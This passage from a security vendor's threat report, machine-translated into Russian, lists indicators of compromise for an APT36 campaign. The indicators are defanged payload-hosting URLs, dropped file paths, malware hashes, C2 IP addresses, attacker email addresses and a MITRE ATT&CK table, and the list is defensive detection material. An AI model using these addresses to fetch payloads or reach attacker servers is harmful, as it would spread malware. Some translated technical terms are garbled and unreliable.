hxxps://googleservices[.]live/dakshf_upload.php
URL-адреса
hxxps://campusportals[.]in/files/documents/bs/economy/
hxxps://campusportals[.]in/files/documents/bs/economy/1.hta
hxxps://campusportals[.]in/files/documents/bs/economy/2.hta
hxxps://campusportals[.]in/files/documents/bs/it/
hxxps://campusportals[.]in/files/documents/bs/it/1.hta
hxxps://campusportals[.]in/files/documents/bs/it/2.hta
hxxps://campusportals[.]in/files/documents/bs/survey/
hxxps://campusportals[.]in/files/documents/bs/survey/1.hta
hxxps://campusportals[.]in/files/documents/bs/survey/2.hta
hxxps://campusportals[.]in/files/2.hta
hxxps://campusportals[.]in/files/documents/bs/2.hta
hxxps://campusportals[.]in/files/documents/xmlnsprcs.hta
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/newpictures.png
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/Salary_Increment_FY_2024.zip
hxxps://dipl[.]site/Content/2022-23/01/03/
hxxps://dipl[.]site/Content/2022-23/01/03/Imge12542.hta
hxxps://dipl[.]site/Content/2022-23/01/04/WhatsApp_Image_2024-05-06.zip
hxxps://dipl[.]site/Content/2022-23/01/01/
hxxps://dipl[.]site/Content/2022-23/01/01/ugt254d.hta
hxxps://dipl[.]site/Content/2022-23/01/02/US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip
hxxps://slidesfinder[.]com/free-templates/freefiles/158/08978.png
hxxps://slidesfinder[.]com/free-templates/freefiles/158/Letter002.pdf
hxxps://slidesfinder[.]com/free-templates/freefiles/158/rt12.png
hxxps://slidesfinder[.]com/free-templates/freefiles/158/rtloki.png
hxxps://slidesfinder[.]com/free-templates/freefiles/158/tmps.dotm
hxxps://mazagondoc[.]com/documents01/001doc.pdf
hxxps://mazagondoc[.]com/documents01/08978.png
hxxps://mazagondoc[.]com/documents01/Filezilla.exe
hxxps://mazagondoc[.]com/documents01/Letter002.pdf
hxxps://mazagondoc[.]com/documents01/rt12.png
hxxps://mazagondoc[.]com/documents01/sigthief.py
hxxps://mazagondoc[.]com/images/AdobeArm.exe
hxxps://mazagondoc[.]com/images/AdobeReader.bat
hxxps://mazagondoc[.]com/images/Chromes.exe
hxxps://mazagondoc[.]com/images/awccs.bat
hxxps://mazagondoc[.]com/images/igfxtk.bat
hxxps://mazagondoc[.]com/images/igfxtk.exe
hxxps://mazagondoc[.]com/images/msedg.bat
hxxps://mazagondoc[.]com/images/msedg.exe
hxxps://mazagondoc[.]com/images/msedgprefix.exe
hxxps://mazagondoc[.]com/images/sigthief.py
hxxps://mazagondoc[.]com/images/pdf/Naval_Projects_Payment_section_Report_29092023.docx
hxxps://mazagondoc[.]com/images/pdf/cheexe.exe
hxxps://mazagondoc[.]com/images/templates/Aerospace.dotm
hxxps://mazagondoc[.]com/images/templates/Naval_Projects_Payment_section_Report_131023.docx
hxxps://mazagondoc[.]com/images/templates/Slide7.png
hxxps://mazagondoc[.]com/images/templates/logo.png
hxxps://mazagondoc[.]com/images/templates/propritery/doc-logo.png
hxxps://mazagondoc[.]com/images/word/Naval_Projects_Payment_section_Report_131023.docx
hxxps://mazagondoc[.]com/images/word/Project_and_Services_Section_report_10102023.docx
Хозяин
C:\Windows\Tasks\useH.hta
C:\Windows\Tasks\useT.hta
C:\Windows\Tasks\alphaT.hta
C:\Windows\Tasks\appH.bat
C:\Windows\Tasks\appT.bat
C:\Windows\Tasks\user01.bat
C:\Windows\Tasks\user02.bat
C:\ProgramData\VSUpdates\svirbre.exe
C:\Users\пользователь\AppData\Roaming\AdobeArm.exe
C:\Users\пользователь\AppData\Local\PrintsLogs\Postgres.exe
C:\Users\Public\BroadCastHUB\DUser.dll

APT36

f264ed8c76b1102ea55d73d931ab879b survey1.zip
6065407484f1e22e814dfa00bd1fae06 PCBL_05_25_ИЮНЬ_2024_Консолидация IP-адресов.pdf.desktop
bdde8c9948142fafeec00d7094ae964f LTC_checklist.desktop
bd9de1f98e8797926ab0fc9f2c6ca888 Перевод в соответствии с фазой III ротационного перевода.рабочий стол
8b5bf198e4948d4fe6a4b0402f7246e5 IAFT-1715.zip
2bf596603c432fa46b494dc3edd2d30f GTK-Theme-Parse.txt
3a65fbc14bd7ff12cda97282935eefd8 Форма опроса об использовании Интернета_protected.pdf (приманка)
ELF
4eaa6a69c9835c29ce8d39734e5d3d5f Пароль (загрузчик Golang)
4c52bb770d7b8639e1f305f908dbc800 vmcoreinfo.txt (DISGOMOJI)
Посейдон
c5ef19c97462e791f21c32931975dc7b distro-dlna
b2d407d569e4b21ff12736dbc434577f cjs-bin
12aef7e734fb872f9160a1c2a47326d5 bin-xdg
7d6373d9f9a4270bd8af53f3861d7a9c acpid-dit
IP-адреса
165.22.221[.]71
178.128.166[.]148
152.42.162[.]105
161.35.207[.]209
159.65.146[.]80
157.245.100[.]177
Посейдон
URL-адреса
hxxps://campusportals[.]in/myfiles/bdocuments/survey1.zip
165.22.221[.]71/distro-dlna
178.128.166[.]148/cjs-bin
159.65.146[.]80/bin-xdg
157.245.100[.]177/acpid-dit
hxxps://drive.google[.]com/file/d/1p9rewZLjJ3WUdmj_As6el9G5IPNtkEUN/view?usp=sharing
hxxps://drive.google[.]com/file/d/1cAPvjfakAWIHVa_cZXw_iwLDqsIi1uRX/view?usp=sharing
hxxps://drive.google[.]com/file/d/1cIxWwVrhS4L6EHiDKc8Ua86NtciC4Njx/view?usp=sharing
hxxps://drive.google[.]com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe
hxxps://drive.google[.]com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t
hxxps://drive.google[.]com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_
fikumatry@gmail[.]com
fitfalcon0900@gmail[.]com

MITRE ATT & CK

тактика Идентификатор техники Имя
Развитие ресурсов T1583.001
T1584.001
T1587.001
T1588.001
T1588.002
T1608.001
T1608.005
Приобретение инфраструктуры: домены
Инфраструктура компрометации: домены
Возможности развития: вредоносное ПО
Получить возможности: вредоносное ПО
Получить возможности: инструмент
Возможности этапа: загрузка вредоносного ПО
Возможности этапа: Ссылка на цель
Первоначальный доступ T1566.001
T1566.002
Фишинг: фишинговое вложение
Фишинг: Ссылка на фишинг
Типы T1106
T1129
T1059
T1047
T1204.001
T1204.002
Родной API
Общие модули
Интерпретатор команд и сценариев
Инструментарий управления Windows
Казнь пользователя: вредоносная ссылка
Пользовательское выполнение: вредоносный файл
Настойчивость T1053.003
T1547.001
T1547.013
Запланированная задача/задание: Cron
Ключи запуска реестра / Папка автозагрузки
Выполнение автозапуска загрузки или входа в систему: записи автозапуска XDG
Уклонение от защиты T1027.010
T1036.005
T1036.007
T1140
T1218.005
T1574.002
T1027.009
T1027.010
Запутывание команд
Маскарадинг: Соответствие законному имени или местоположению
Маскарад: двойное расширение файла
Деобфускация/декодирование файлов или информации
Выполнение системного двоичного прокси: Mshta
Поток выполнения Hijack: боковая загрузка DLL
Замаскированные файлы или информация: встроенные полезные нагрузки
Замаскированные файлы или информация: запутывание команд
Дискавери T1012
T1016
T1033
T1057
T1082
T1083
T1518.001
Реестр запросов
Обнаружение конфигурации сети системы
Обнаружение владельца системы/пользователя
Обнаружение процесса
Обнаружение системной информации
Обнаружение файлов и каталогов
Обнаружение программного обеспечения: обнаружение программного обеспечения безопасности
‎ T1005
T1056.001
T1074.001
T1119
T1113
T1125
Данные из локальной системы
Захват ввода: кейлоггинг
Постановка данных: постановка локальных данных
Автоматизированный сбор
Захват экрана
Video Capture
Управление и контроль T1105
T1571
T1573
T1071.001
Входной инструмент передачи
Нестандартный порт
Зашифрованный канал
Протокол прикладного уровня: веб-протоколы
эксфильтрации T1020
T1041
T1567
Автоматическая эксфильтрация
Эксфильтрация через канал C2
Эксфильтрация через веб-сервис

Автор: Sathwik Ram Prakki

 предыдущий постКак не поддаться поддельным письмам вроде «Вас не...
Следующий пост  Каковы могут быть приблизительные потери, вызванные недавним сбоем в работе ИТ-систем?
Сатвик Рам Пракки

О Сатвике Раме Пракки

Сатвик Рам Пракки работает исследователем в области безопасности в лаборатории безопасности компании Quick Heal. Его основные направления деятельности: Threat Intelligence, поиск угроз и написание статей на темы...

Статьи Сатвика Рама Пракки »

Похожие статьи

  • Операция «Тихий ротор»: целенаправленная кампания подрывает сектор беспилотной авиации в преддверии саммита в Москве.

    6 мая 2026
  • Вредоносная кампания использует SVG-файлы, вложения электронной почты и CDN для удаления XWorm и Remcos с помощью скриптов BAT

    11 сентября, 2025
  • SVC Новый Stealer на горизонте

    21 марта 2025
Избранные авторы
  • Seqrite
    Seqrite

    Seqrite является ведущим поставщиком решений в области корпоративной кибербезопасности. Специализируется на...

    Прочитайте больше статей Seqrite
  • Джоти Карлекар
    Джоти Карлекар

    Я страстный писатель, которому нравится создавать контент о новых технологиях и...

    Прочтите другие статьи Джоти Карлекара
  • Бинеш П.
    Бинеш П.

    Я страстный энтузиаст кибербезопасности и преданный писатель. Обладая талантом...

    Читайте другие статьи Бинеша П.
  • Санджай Каткар
    Санджай Каткар

    Санджай Каткар — соуправляющий директор Quick Heal Technologies...

    Читайте другие статьи Санджая Каткара
Темы
склонный (25) Cyber-атака (36) кибер-атаки (58) кибератаки (16) кибератаки (15) Информационная безопасность (340) информационная безопасность (34) Киберугроза (33) кибер-угрозы (51) Данные нарушения (56) нарушения данных (29) Потеря данных (28) предотвращение потери данных (34) data privacy (16) защита данных (34) безопасность данных (19) DLP (50) ДПДП (14) ДПДПА (17) Шифрование (16) для защиты конечных точек (112) Безопасность предприятия (19) Эксплуатировать (13) GDPR (14) вредоносных программ (76) анализ вредоносных программ (14) вредоносная атака (23) МДМ (27) Microsoft (15) MITRE ATT & CK (13) Сетевая безопасность (26) фишинг (30) Ransomware (69) атака ransomware (31) атаки ransomware (31) защита от копирования (16) Seqrite (41) Seqrite Шифрование (27) Seqrite EPS (33) Seqrite Услуги (16) обнаружение угрозы (13) Threat Intelлигенция (19) UTM (34) Уязвимость (16) нулевое доверие (13)
Seqrite Labs

Ведущий поставщик решений по корпоративной ИТ-безопасности, упрощающий защиту конечных точек, данных и сетей с помощью лучших в своем классе решений по предотвращению, обнаружению и реагированию на угрозы по всему миру.

Подробнее о Seqrite

Наши соцсети:

Подпишитесь на нашу рассылку

Будьте в курсе последних тенденций и новостей в сфере кибербезопасности.

Загрузка
Продукция и Услуги
  • облако
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • На Прем
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Платформа
  • Malware Analysis Platform
  • Микро Бизнес
  • SOHO Total Edition
  • Услуги
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Кибербезопасность и Data Privacy Awareness
Ресурсы
  • статьи
  • Статьи
  • Даташит
  • Отчеты об угрозах
  • Руководства
  • точка зрения
  • Понимание Data Privacy
  • Диалоги ДПДП
  • Политика и соответствие
  • Лицензионное соглашение
  • GoDeep.AI
  • SIA
  • Час конфиденциальности
Свяжитесь с нами
  • Зарегистрированные офисы
  • Давайте поговорим о кибербезопасности
Поддержка
  • Техподдержка
  • Загрузка программного обеспечения
  • Автономное обновление
  • Обновление прошивки
  • Обновления
  • Документация
О Нас
  • О нас Seqrite
  • Руководство
  • Награды и признание
  • Новости
Сотрудничайте
  • Партнерская программа
  • Найти партнера
  • Стать партнером
  • Seqrite Сертификаты

© 2026 Quick Heal Technologies Ltd.

Карта сайта Политика конфиденциальности Юридическая информация Политика использования файлов cookie Условия эксплуатации